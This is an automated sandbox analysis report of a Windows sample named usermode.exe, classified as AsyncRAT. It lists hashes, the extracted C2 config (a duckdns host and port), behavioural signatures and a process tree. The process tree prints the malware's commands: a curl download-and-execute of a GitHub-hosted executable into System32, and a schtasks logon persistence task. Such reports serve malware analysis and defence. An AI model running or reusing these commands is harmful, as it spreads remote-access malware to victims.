Overview

overview

10

Static

static

3

usermode.exe

windows7-x64

1

usermode.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/06/2024, 04:13

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    usermode.exe

  • Size

    571KB

  • MD5

    6ff532b8468ad647aea71708cdf259ff

  • SHA1

    8bf56f629e2c32153ba5037bf981dec868f41ce8

  • SHA256

    7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99

  • SHA512

    4c828064856d29a6530a7b633f4772190ef5d5dd92909ae78610c9319ac9d0f5388e8a15515a824109576d31522d89e06ed88dd1f8e52a8ea058c6e345ea852b

  • SSDEEP

    12288:rWYUNQEMuGIbS2McEqE1CMSD9Opbd0xEY8Q3:pUNiufScEf0H9OpqxL

Score
10/10
asyncratdefaultrat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

hmnms.duckdns.org:2035

Mutex

gr4g4guhuhuie3hfgggtttu3hf33efffrfrgrgrg3f

Attributes
  • delay

    1

  • install

    true

  • install_file

    Update.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\usermode.exe
    "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe
        3⤵
        • Drops file in System32 directory
        PID:4412
      • C:\Windows\System32\boot_cnfg_x32.exe
        C:\\Windows\\System32\\boot_cnfg_x32.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4472
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4560
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:944
          • C:\Users\Admin\AppData\Roaming\Update.exe
            "C:\Users\Admin\AppData\Roaming\Update.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5
        3⤵
          PID:5008
        • C:\Windows\system32\find.exe
          find /i /v "md5"
          3⤵
            PID:1224
          • C:\Windows\system32\find.exe
            find /i /v "certutil"
            3⤵
              PID:3536
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8
          1⤵
            PID:2636

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat
                  Filesize

                  150B

                  MD5

                  2c8bc37b47cf08664a78ebbffd76d23b

                  SHA1

                  49e2f3d19a7b9edd662b9763ae47629496ca4758

                  SHA256

                  8a0da6a175df4c5ab306e7a27093f37aa60ef6f86f5e50d2b5c49fe991fad73a

                  SHA512

                  b81d18a37f816146daf286018ae6eea6ef888abb817d3db62d0552b7214494c5d2fd9a352176c84811a04581e3660da5c17a48aed696cd8feaaf0ee32f179648

                  Download Submit

                • C:\Windows\System32\boot_cnfg_x32.exe
                  Filesize

                  48KB

                  MD5

                  8f601efcbf3eb183bbd6500296b9ccd2

                  SHA1

                  2542d3fe0e97fa969c0ef8e86676ba1c72e6e846

                  SHA256

                  5e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd

                  SHA512

                  d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08

                  Download Submit

                • memory/4500-4-0x00007FFA041D3000-0x00007FFA041D5000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/4500-5-0x00000000009F0000-0x0000000000A02000-memory.dmp

                  Filesize

                  72KB

                  Download

                • memory/4500-6-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/4500-11-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

                  Filesize

                  10.8MB

                  Download